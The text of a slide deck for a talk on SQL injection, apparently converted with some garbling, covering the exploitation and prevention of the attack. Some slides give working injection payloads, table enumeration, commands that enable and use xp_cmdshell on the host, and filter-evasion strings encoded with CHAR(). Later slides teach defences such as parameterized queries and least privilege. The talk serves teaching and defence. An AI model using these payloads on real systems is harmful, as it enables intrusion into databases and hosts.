Devouring Security

Sqli Exploitation & prevention

Part 1 & 2

Marudhamaran Gunasekaran

Watch the screen recording of this presentation at

Devouring Security – Sql Injection Part 1 - http://vimeo.com/83658524 Devouring Security – Sql Injection Part 2 – http://vimeo.com/85256464

Security

FeelingReality

Trade offsWisdom

Ignorance is no excuse

Disclaimer

Techniques and Tools in this presentation should be used or applied on an application, only with prior consent of the application’s owner.

Illegal otherwise.

Sqli – Media coveragehttp://pastebin.com

/HU

jZP

aF3

Sqli – Media coveragehttp://thepiratebay.se/torrent/6443601

Sqli – Media coveragehttp://w

ww

.bloomberg.com

/news/2013-01-24/sony-fined-394-000-over-2011-hacker-attack-on-playstation-data.htm

l

Sqli – Media coverage http://ww

w.eteknix.com

/turkish-hackers-claim-to-have-leaked-40000-sony-italy-account-details/

Sqli – Media coveragehttp://new

s.techworld.com

/security/3331283/barclays-97-percent-of-data-breaches-still-due-to-sql-injection/

Sqli – MediaCoverage

Sqli – Why does it exist?Yeah! I can develop/deploy without restrictions , I have full access.

Thanks bro! I am your uninvited database administrator now. I owe you, and your data.

I like them admin rights

Sqli – Why does it exist?

Conglomeration of Sensitive Data

Would you keep all your belongings in your home, or would you keep some in your safe deposit box?

Blindly Trusting Unsanitized User Input

"Over thousands of queries in a moderate- to large-size application, that 2% can result in a handful of SQL injections," Chou says. "All an attacker needs to do is find one of these, and you'll have millions of records stolen and a headline in Dark Reading.“

Sqli – Why does it exist?

• It’s not always about a developer knowing better, there are tons and tons of legacy code• Remember, DBA’s write SQL too• No strict access control policies• Windows based/Desktop based applications are

directly ported to the web• Developer’s still don’t know the complete truths

about Sqli

Sqli 101

../Products?name=ratSELECT 1 FROM Products WHERE ProductName =

‘rat‘

../Products?name=rat‘ or 1=1 --

SELECT 1 FROM Products WHERE ProductName = ‘rat’ or 1=1 -- ’

or true

Sqli 101

• http://sqli:8020/Sqli/

• http://localhost/WebGoat/attack?Screen=147&menu=1100&stage=1

Sqli U

Sqli U

http://sqli:8020/Sqli/ProductSearch

Sqli E

Sqli E

http://sqli:8020/SqliErrorRiddle/

Sqli E-- table enumeratorSELECT TOP 1 Convert(INT, NAME)FROM sys.tablesWHERE object_id = (

SELECT TOP 1 object_idFROM (

SELECT TOP 2 object_idFROM sys.tablesORDER BY object_id) AS TEMP

ORDER BY object_id DESC)

Enumerating in MySQl is very easy with OFFSET.

ORMs and SPs Loopholes

http://sqli:8020/SqliORM/ProductSearch

It’s not an ORM’s problem to have you loaded with features

ALTER PROCEDURE SearchProducts (@Item VARCHAR(100))ASBEGIN

DECLARE @query VARCHAR(400)

SET @query = 'SELECT * FROM Products WHERE ProductName LIKE ''%' + @Item + '%'''

PRINT @query

EXEC (@query)ENDGO----------------------------------------------------------------------------------------------- Execute goodEXEC SearchProducts 'chai'GO-- Execute badEXEC SearchProducts 'chai%'' or 1=1--'GO

Fixing SP LoopholesALTER PROCEDURE SearchProductsBetter (@Item VARCHAR(200))ASBEGIN

DECLARE @safequery NVARCHAR(400)DECLARE @params NVARCHAR(200)

SET @safequery = N'SELECT * FROM Products WHERE ProductName LIKE ''%'' + @param1 + ''%'''

SET @params = N'@param1 NVARCHAR(200)‘;

EXECUTE SP_EXECUTESQL @safequery,@params,@param1 = @Item

ENDGO----------------------------------------------------------------------------------------------- Execute badEXEC SearchProductsBetter 'chai%'' or 1=1--'GO

Profiling Host OS

• Privilege misuse and rooting

Profiling Host OS

-- enable command shellEXEC sp_configure 'show advanced options',

1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

-- disable command shellEXEC sp_configure 'show advanced options',

1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;

Profiling Host OS

-- play time!exec xp_cmdshell 'tasklist‘

exec master.dbo.xp_cmdshell 'whoami‘

exec xp_cmdshell 'netsh advfirewall firewall show rule name=all profile=public'

Profiling Host OS

-- enumerate and remove tracecreate table tempsz(temp varchar(MAX));insert into tempsz exec

xp_cmdshell 'tasklist';select * from tempsz;drop table tempsz;

-- enumerate and leave tracecreate table tempsz(temp varchar(MAX));insert into tempsz exec

xp_cmdshell 'tasklist';

-- get enumerated information and remove traceselect temp from tempsz;drop table tempsz;

Profiling Host OS

-- schedule a shutdown and send message to the user named maran

exec xp_cmdshell 'shutdown -s -t 6000'; exec xp_cmdshell 'msg maran You will be shut down in 100 minutes'

-- abort the shutdown and send message to the user named maran

exec xp_cmdshell 'shutdown -a'; exec xp_cmdshell 'msg maran I have heard your prayer. You are salvaged'

Profiling Host OS

OSCommand_Run in Oracle does the equivalent of xp_cmdshell in Sql server.

Sqli T

Just biding time, my friend

Sqli T

OracleDBMS_LOCK.sleep

TSql

WAIT FOR DELAY

MySqlBENCHMARK

Sqli BBlind, but I could get by

Sqli BBlind, not as fast, but I could travel miles

IDS Evasive Techniques

‘485’=“485”‘5’>’1’“QSNR”=“QSNR”REPLACE('SEL/**/CT', '/**/', '')

Blacklist Filter Evasion

';exec xP_cMdsheLL 'dir';--

';ex/**/ec xp_cmds/**/hell 'dir';-- [old versions]

';exec/**/xp_cmdshell/**/'dir';--

';Declare @cmd as varchar(3000);Set @cmd = 'x'+'p'+'_'+'c'+'m'+'d'+'s'+'h'+'e'+'l'+'l'+'/**/'+''''+'d'+'i'+'r'+'''';exec(@cmd);--

Blacklist Filter Evasion Declare @cmd as varchar(3000);Set @cmd

=(CHAR(101)+CHAR(120)+CHAR(101)+CHAR(99)+CHAR(32)+CHAR(109)+CHAR(97)+CHAR(115)+CHAR(116)+CHAR(101)+CHAR(114)+CHAR(46)+CHAR(46)+CHAR(120)+CHAR(112)+CHAR(95)+CHAR(99)+CHAR(109)+CHAR(100)+CHAR(115)+CHAR(104)+CHAR(101)+CHAR(108)+CHAR(108)+CHAR(32)+CHAR(39)+CHAR(100)+CHAR(105)+CHAR(114)+CHAR(39)+CHAR(59));EXEC(@cmd);--

EXEC (exec master..xp_cmdshell 'dir')

Sqli Exploitation tools

• Sqlmap• sqlninja• Safe3SI• Enema• Havij• Pangolin• BSQL Hacker……………………. and a lot more

Sqli Exploitation tools

Demonstration

1.Safe3SI2.Enema3.Sqlmap

Sqli Feeble Fixes

Blacklisting is suicide

IDSs are not very effective for Sqli

Feeble Fixes

Blacklisting

(can’t filter all possible dangerous inputs like below)

“QSNR”=“QSNR”REPLACE('SEL/**/CT', '/**/', '')

Blacklisting for Death

Blacklisting for Death

Blacklisting for Death

Sqli Prevention

Sqli Prevention

Exploitation toolsFuzzers Active/Passive vulnerability scanners

Core Defense

Input Validation with Whitelist, Type casting or/and RegEx.

Core Defense Validation with RegEx

Core DefenseCREATE PROCEDURE dbo.doQuery (@id NCHAR(4))ASDECLARE @query NCHAR(64)

IF RTRIM(@id) LIKE '[0-9][0-9][0-9][0-9]'BEGIN

SELECT @query = 'select ccnum from cust where id = ''' + @id + ''''

EXEC @queryEND

RETURN

-- Or, better yet, force an interger parameter

CREATE PROCEDURE dbo.doQuery(@id smallint)

Core Defense

Parametrization a.k.a prepared statements

[refer to your framework for support]

Core Defense

Encrypt data to prevent disclosure when physical database files are stolen.

1. Encryption does not do a darn thing to protect you from direct Sqli2. Encryption only protects you from Sqli induced attacks

Core Defense

Database user account audits

1. Selective privilege principle2. Least privilege principle

Code Reviews - Spot and Stop Sqli

Code Reviews - Spot and Stop Sqli

CAT.Net Sqli Scan

CAT.Net Sqli Scan

MicrosoftACECodeAnalysisReport.htm

Netsparker community edition

What now?

Sqli Cheatsheet - http://ferruh.mavituna.com/sql-injection-

cheatsheet-oku Dynamic queries in T-SQL - http://www.sommarskog.se/dyn-search-

2005.htmlhttp://www.sommarskog.se/dyn-search-

2008.html

End of the world

Watch the screen recording of this presentation at my vimeo channel

Devouring Security – Sql Injection Part 1 - http://vimeo.com/83658524

Devouring Security – Sql Injection Part 2 – http://vimeo.com/85256464